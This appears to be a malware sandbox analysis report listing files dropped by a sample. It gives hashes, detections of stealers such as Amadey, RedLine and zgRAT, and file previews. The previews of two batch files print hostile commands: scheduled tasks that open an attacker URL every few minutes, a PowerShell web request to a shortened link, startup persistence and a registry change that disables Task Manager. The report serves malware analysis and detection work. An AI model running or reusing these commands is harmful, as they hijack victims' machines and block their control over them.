SSDEEP:	24576:vjOwtWBrHdDD2PVc1ZQBQkoTjPCpKTbzMxaZc+zrUmz:vCwtW9dDyPyz6DMPCMTbzdZc+kmz
MD5:	242214131486132E33CEDA794D66CA1F
SHA1:	4CE34FD91F5C9E35B8694007B286635663EF9BF2
SHA-256:	BAC402B5749B2DA2211DB6D2404C1C621CCD0C2E5D492EB6F973B3E2D38DD361
SHA-512:	031E0904D949CEC515F2D6F2B5E4B9C0DF03637787FF14F20C58E711C54EEC77D1F22AA0CF0F6EFD65362C1FC0066645D5D005C6A77FE5B169427CDD42555D29
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 53%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....N\|f................................. ... ....@.. ....................... ............@.....................................K.................................................................................... ..................H............text........ ...................... ..`._LW......... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\28feeece5c\Hkbsse.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000108001\ldr.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	424960
Entropy (8bit):	6.51614449175576
Encrypted:	false
SSDEEP:	12288:pfSPtGpmLb84Jjzo6yrBuKuJ+ITOClUd:ktGpmf8edykhVlUd
MD5:	C4AEAAFC0507785736E000FF7E823F5E
SHA1:	B1ACDEE835F02856985A822FE99921B097ED1519
SHA-256:	B1D5B1E480A5731CAACC65609EAF069622F1129965819079AA09BC9D96DADDE5
SHA-512:	FBAEFBCE3232481490BCE7B859C6C1BAFD87EE6D952A2BE9BF7C4ED25FE8FC9AFF46C2246E247AA05CE8E405831A5905CA366C5333EDE0AF48F9A6287479A12D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\28feeece5c\Hkbsse.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L.....rf..........................................@.......................................@.................................,....................................K......8...................l..........@............................................text............................... ..`.rdata..:...........................@..@.data....e... ...4..................@....rsrc...............................@..@.reloc...K.......L...0..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\6.exe

Download File

Process:	C:\Users\user\Desktop\1Vkf7silOj.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5037056
Entropy (8bit):	7.9825690955945365
Encrypted:	false
SSDEEP:	98304:/U1ygjPf+YEwNhQ9li49Zv85P95RPwAaj249R5EkDAUR:M0iPG4hQzi49ZgP/Rmj2gwkDA
MD5:	5BB3677A298D7977D73C2D47B805B9C3
SHA1:	91933EB9B40281E59DD7E73D8B7DAC77C5E42798
SHA-256:	85EB3F6BA52FE0FD232F8C3371D87F7D363F821953C344936AB87728BA6A627F
SHA-512:	D20F862E9FADB5AD12EDDAAE8C6EBBFA03D67D35C5CA272E185206EB256CD6A89C338CE608C992DF715D36A3F1624A507DBE324A057BD412B87438F4A008F33D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 54%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...V.rf..............................i...........@................................. .M...@..................................5:.......z.......................y.\.................................................... ..L............................text...n........................... ..`.rdata..k*..........................@..@.data...`...........................@....vmp-~.&..(.. ...................... ..`.vmp-~.&..... ......................@....vmp-~.&0.K..0....K................. ..`.reloc..\.....y.......K.............@..@.rsrc.........z.......K.............@..@........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7.exe

Download File

Process:	C:\Users\user\Desktop\1Vkf7silOj.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1850368
Entropy (8bit):	7.949858230487296
Encrypted:	false
SSDEEP:	49152:+cGpBBa72Cb7j7sMC8uB5cOtr9OwGlFN:61ab33y5c0r9OvL
MD5:	B60D82B8244E964110F66E7AD34DC37B
SHA1:	413EB99C2AB5EA8F43D651B0100E76FC53AEBA70
SHA-256:	A684E5308B5EC3D09A9BD982D7396290F29BCBE67FD9E9B2683545A9B746D94C
SHA-512:	0641D19E3F3B71F0A8DEF8EEB19AC9364ABC9F9F12762272A41331F3EE7E2A2EF5F96CA7CCBE879C21C3ABEFB8EAFAC2A46AC4901C0791BE9B391DDE754F5BB4
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L...*.^f.............................pI...........@...........................I.....(.....@.................................X...l............................PI.............................PPI..................................................... . ............................@....rsrc...............................@....idata ............................@... ..).........................@...tpchzztf.0...00..$..................@...yamaqmnm.....`I.....................@....taggant.0...pI.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\7.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1850368
Entropy (8bit):	7.949858230487296
Encrypted:	false
SSDEEP:	49152:+cGpBBa72Cb7j7sMC8uB5cOtr9OwGlFN:61ab33y5c0r9OvL
MD5:	B60D82B8244E964110F66E7AD34DC37B
SHA1:	413EB99C2AB5EA8F43D651B0100E76FC53AEBA70
SHA-256:	A684E5308B5EC3D09A9BD982D7396290F29BCBE67FD9E9B2683545A9B746D94C
SHA-512:	0641D19E3F3B71F0A8DEF8EEB19AC9364ABC9F9F12762272A41331F3EE7E2A2EF5F96CA7CCBE879C21C3ABEFB8EAFAC2A46AC4901C0791BE9B391DDE754F5BB4
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L...*.^f.............................pI...........@...........................I.....(.....@.................................X...l............................PI.............................PPI..................................................... . ............................@....rsrc...............................@....idata ............................@... ..).........................@...tpchzztf.0...00..$..................@...yamaqmnm.....`I.....................@....taggant.0...pI.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP000.TMP\ins.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe
File Type:	DOS batch file, ASCII text, with very long lines (303), with CRLF line terminators
Category:	modified
Size (bytes):	1961
Entropy (8bit):	5.332300231733879
Encrypted:	false
SSDEEP:	48:3Q3ZQtOaHR2SRwjDocZoXLfpF2v2gx2+nbcJky24i:A3yDkpQ6nb8o
MD5:	0BE4CBFA51FE5F8010E78553A28F2779
SHA1:	AE21783C148AE1443FA87A43B9B51CB0AB1A799B
SHA-256:	CC56D197270CDF7C3B5C193EC5B3C63DD87B57B58F90571649F8F0E29A6F1A90
SHA-512:	337A332EECB12CB065A09B3AE01E86802082C576B203FFD1A8270C69172036DC244ECFFAD1FBA3DE76D573C77F1315821A563D2A4AED73BFEB9E9BDF6107EDFD
Malicious:	false
Preview:	@echo off..if exist %TEMP%\1s.txt exit....schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"%ProgramFiles%\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"..schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"%ProgramFiles%\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"....powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"....set tempBatFile=%TEMP%\install.bat..echo schtasks /create /tn "Cleaner" /tr "C:\Users\%username%\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00 >> %tempBatFile%..echo reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001 >> %tempBatFile%..echo schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"%ProgramFiles%\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F >> %tempBatFile%..echo schtasks.exe /create /SC MINUTE /MO 11 /TN

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tcjhj0if.3us.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wabtgtek.swb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xj5jztyf.1dx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhzbo1hp.5zd.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	424960
Entropy (8bit):	6.516408105291076
Encrypted:	false
SSDEEP:	12288:5fSPtGpmLb84Jjzo6yrBuKuJ+ITOC0Ud:UtGpmf8edykhV0Ud
MD5:	07101CAC5B9477BA636CD8CA7B9932CB
SHA1:	59EA7FD9AE6DED8C1B7240A4BF9399B4EB3849F1
SHA-256:	488385CD54D14790B03FA7C7DC997EBEA3F7B2A8499E5927EB437A3791102A77
SHA-512:	02240FF51A74966BC31CFCC901105096EB871F588EFAA9BE1A829B4EE6F245BD9DCA37BE7E2946BA6315FEEA75C3DCE5F490847250E62081445CD25B0F406887
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L...).nf..........................................@.......................................@.................................,....................................K......8...................l..........@............................................text............................... ..`.rdata..:...........................@..@.data....e... ...4..................@....rsrc...............................@..@.reloc...K.......L...0..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\install.bat

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	572
Entropy (8bit):	5.132401837852097
Encrypted:	false
SSDEEP:	12:Zusch6ZNfj38RmVjhRFIbh/EoxHFQFNuLRXmIZzRDuLRXmIn:Zudh+h8RmV1fToQFYLooSLoI
MD5:	4B5B69226E9A832DF70364A846AB4DF3
SHA1:	1A1222C91D6DB44CB3156C26B683A7D09166161F
SHA-256:	59DF729DFE5E02010ABC6298190CC0927C18766EDC8C1CC1BA509AFC28C3D16A
SHA-512:	09FBE999089D1FA47AAC9EB7A0C2A6CF0A11A0F83FCA19F61133905B6E867EAC3DE90876DE53FE280B8A2206E4E93C0D063171D597CF3AC2122DDEBC96422294
Malicious:	false
Preview:	schtasks /create /tn "Cleaner" /tr "C:\Users\user\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00 ..reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001 ..schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F ..schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F ..

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	343040
Entropy (8bit):	6.242244970103393
Encrypted:	false
SSDEEP:	6144:7hzFq6XNEWnmTLqxLHj8N1ul8rZMHuBqEzuDV:7hz0KSQESDj8b0Hu8uu
MD5:	894C2E356E72DA7A60C2978A258B2081
SHA1:	D9D57F6BF516C5A381DF6D5A81D73314A9A60FFB
SHA-256:	6A76E1042B46A21B225B20EB8D93AAC9AFD4F028F2FA4C7D09D1F478A67A0352
SHA-512:	C73DDAFD2BD0DD582DFB5030460D46B9BA7E9746E169131CC0BAFDBDA74792BFAE2CE6604A9450B28284339915D07569596D1E32B21F1F176445432F8BCBDABF
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....y...............0..,..........nK... ...`....@.. ....................................@................................. K..K....`..$............................................................................ ............... ..H............text...t+... ...,.................. ..`.rsrc...$....`......................@..@.reloc...............:..............@..B................PK......H.......PZ...z......@...h....)..............................................(......0...........s........~....%:....&~..........s....%.....(...+o.....8[....o...............%..F~}...(.....%..G~}...(.....%..H~}...(.....%..e~}...(.....~~...(.......o......8......(......s.......sL.......~....}....~...........s....(....o....}......{.....I~}...(....o........9......I~}...(.......8C........~}...(....o....:......{....~....(....8......{....~....(.........(...........9........o........(

C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	304128
Entropy (8bit):	5.030426928666015
Encrypted:	false
SSDEEP:	3072:NqFFrqwIOGfJyD3s6m5LoI8Ca5hWi/ML6Q8hdjOTZ6fHgfcZqf7D34deqiOLCbBm:kBIOGQUn8WAdCTZ0icZqf7DInL
MD5:	8A70C2805C58FCCA31037C6DD59E5833
SHA1:	233491EFA8AAB92ECC929AE138FBFBF06877C992
SHA-256:	605636AF0DD1495E8A4CBBF6492E5862A4E7536710B533EF1BF1BC8E2670F9D8
SHA-512:	E2041EA7139F34CC621EA0BC0E312CBF41431CDCF4DC5BE0C68445BB90BE47935E359B6956FE9819E25077BBE6CE1A72CA7349E3956ADDA3246100C747725C12
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 59%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0................. ........@.. ....................................@.....................................O...................................d................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\d3d9.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	286208
Entropy (8bit):	6.802631681931599
Encrypted:	false
SSDEEP:	6144:NsxKq9ZI3iaQalU4db+ovNiEcze7mxwChUTocD/5UR:StZILdb+ovNHcWk+tRUR
MD5:	8FA26F1E37D3FF7F736FC93D520BC8AB
SHA1:	AD532E1CB4A1B3CD82C7A85647F8F6DD99833BB1
SHA-256:	6C47DA8FBD12F22D7272FBF223E054BF5093C0922D0E8FB7D6289A5913C2E45D
SHA-512:	8A0B53CBC3A20E2F0FD41C486B1AF1FBBCF7F2FED9F7368B672A07F25FAAA2568BBDBCF0841233AC8C473A4D1DEE099E90BF6098A6FA15E44B8526EFDAFC1287
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.)...GQ..GQ..GQL.DP..GQL.BP..GQL.CP..GQL.FP..GQ z<Q..GQ..FQe.GQ.=BP..GQ.=CP..GQ.=DP..GQ..GQ..GQj=GP..GQj=EP..GQRich..GQ........................PE..L....N\|f...........!...&.`...................p............................................@.............................T...T...<............................p..P... ...............................`...@............p..P............................text...3_.......`.................. ..`.rdata...c...p...d...d..............@..@.data...\...........................@....reloc..P....p.......J..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\Tasks\Hkbsse.job

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe
File Type:	data
Category:	dropped
Size (bytes):	306
Entropy (8bit):	3.4857639129897753
Encrypted:	false
SSDEEP:	6:DES+tDZXUKJUEZ+lX1McN2UetcVAkXIEZ8MlW8+y0l/9t0:QjJlvJQ1McEkXd8kX+V/9t0
MD5:	E48F1D11E8BE7678E5CD473EA4F70A68
SHA1:	62ED777AA6BF7E5A9347A51C854EC052E732341D
SHA-256:	118DD307A5A66887670E01EB65252EDD0AAC15EAD2CA39D7876F83E42A4683C2
SHA-512:	4E826DC81F97E2075CE727E10A85AE0B5D55DA012AABAA537B51896F17B408F4C7BDFE3E690C7A406D49449AFC5BF86A1287322DB88B3E7F27AA1E8B743FE2D6
Malicious:	false
Preview:	.....Ua.../J..]...yF.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.2.8.f.e.e.e.c.e.5.c.\.H.k.b.s.s.e...e.x.e.........F.R.O.N.T.D.E.S.K.-.P.C.\.f.r.o.n.t.d.e.s.k...................0.................).@3P.........................

C:\Windows\Tasks\axplong.job

Download File

Process:	C:\Users\user\AppData\Local\Temp\7.exe
File Type:	data
Category:	dropped
Size (bytes):	308
Entropy (8bit):	3.5131601689771146
Encrypted:	false
SSDEEP:	6:eadLZX2JUEZ+lX1YC7UPelkDdtcVAkXIEZ8MlW8+y0l/ct0:9dLl2JQ1h7keeDhkXd8kX+V/ct0
MD5:	B2BCEE49401E72633730AA0FB10378B3
SHA1:	D07A5443F0713067770E9CA7D48FC4BE25AF0EBB
SHA-256:	CA9185F87F6C15DC1A1B30B3DD0208D86624075E47605F4CA260B0FB60802CE1
SHA-512:	BFA18DE31AA94637414C7AB30D324AA0DE11E4EF8BC86A9FF51DB0873556651066ACB747174D0857BE55EE72DF037443520C698683B05FA5D8EE043201ECD392
Malicious:	false
Preview:	....6..a4I<N..&.V..>F.......<... .....s.......... ....................<.C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.8.2.5.4.6.2.4.2.4.3.\.a.x.p.l.o.n.g...e.x.e.........F.R.O.N.T.D.E.S.K.-.P.C.\.f.r.o.n.t.d.e.s.k...................0.................(.@3P.........................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.419329841946045
Encrypted:	false
SSDEEP:	6144:1cifpi6ceLPL9skLmb0meSWSPtaJG8nAgex285i2MMhA20X4WABlGuNG5+:Si58eSWIZBk2MM6AFBQo
MD5:	29009790AB19045BA75528ED28792546
SHA1:	CB243F17F189E40DD46F1223A840E1F36A6C4E41
SHA-256:	689B5032D9DABE6B12B852FC62B0C4A18A9F0E057032B5D982BB85C4BDB27D98
SHA-512:	C96529DBAA4E5681A49ADE9A8E6B54520603E173A64A13F1A85D7E91AA47FB6D71AA2695F9C2277A7DFE3CBA78688A6A15E5B997A13AC6444240CDB9D91A880C
Malicious:	false
Preview:	regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...wT..................................................................................................................................................................................................................................................................................................................................................C........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Chrome Cache Entry: 177

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	2833
Entropy (8bit):	7.876846206921263
Encrypted:	false
SSDEEP:	48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
MD5:	18C023BC439B446F91BF942270882422
SHA1:	768D59E3085976DBA252232A65A4AF562675F782
SHA-256:	E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
SHA-512:	A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
Malicious:	false
URL:	https://iplogger.co/favicon.ico
Preview:	.PNG........IHDR...@...@......iq.....IDATx.....e.._Osm...,uY.sYI.w.$..........:VjD..!...o%....5$......... (..;~8."......h...r.^/}...\|..qm.O.w..I.m....>..y>.?_.....;_=.b.R4X..4.2....S!.P.m>......*`........@.....O...\,...o..@..RS.5.3.....M..@.....>..\|....2p ......v...-a.9........V..0.X....`(.....TH.i....o:.....'p3.[.Lx.q.1.....XN/j.M...y..+....!r.P........F.6....M.W./".QK.....?...r....f.7.?...7..y@..-` ......f.7..x.......z-......u6D...M.=.6D....`X..>.......`....?..-....s..\..._...Vc.&......rzM...9B....dJp.......\|....@..O....."je...oGL..1.......R!5\.Q.7.......Mb.x.x....)E.u.b9.Ad.<..x.8.L!...8...aV#..\|>.R...9+.....P......~..^...;?.#q......d.G.a`..I...c9..\..Cc',.l.-.......m.H..E......s.s...:.l>....L....u...g#Q..0.<...3.~=b.....TH.....M......K..a..R48....W.[..6...?...3.)..r.WHd8...o(.^.....]..~.8ef49..F......d.QF.zg).,.#.E.-..q..L.....^.u.x.XY....,.......C.i=lJ..c.?.4E=@......Y.r...`......Z.8].....A../.R...5.-.YG1...b.....y..x.".'Y...b1.....K..$..">..

Chrome Cache Entry: 178

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	2833
Entropy (8bit):	7.876846206921263
Encrypted:	false
SSDEEP:	48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
MD5:	18C023BC439B446F91BF942270882422
SHA1:	768D59E3085976DBA252232A65A4AF562675F782
SHA-256:	E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
SHA-512:	A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
Malicious:	false
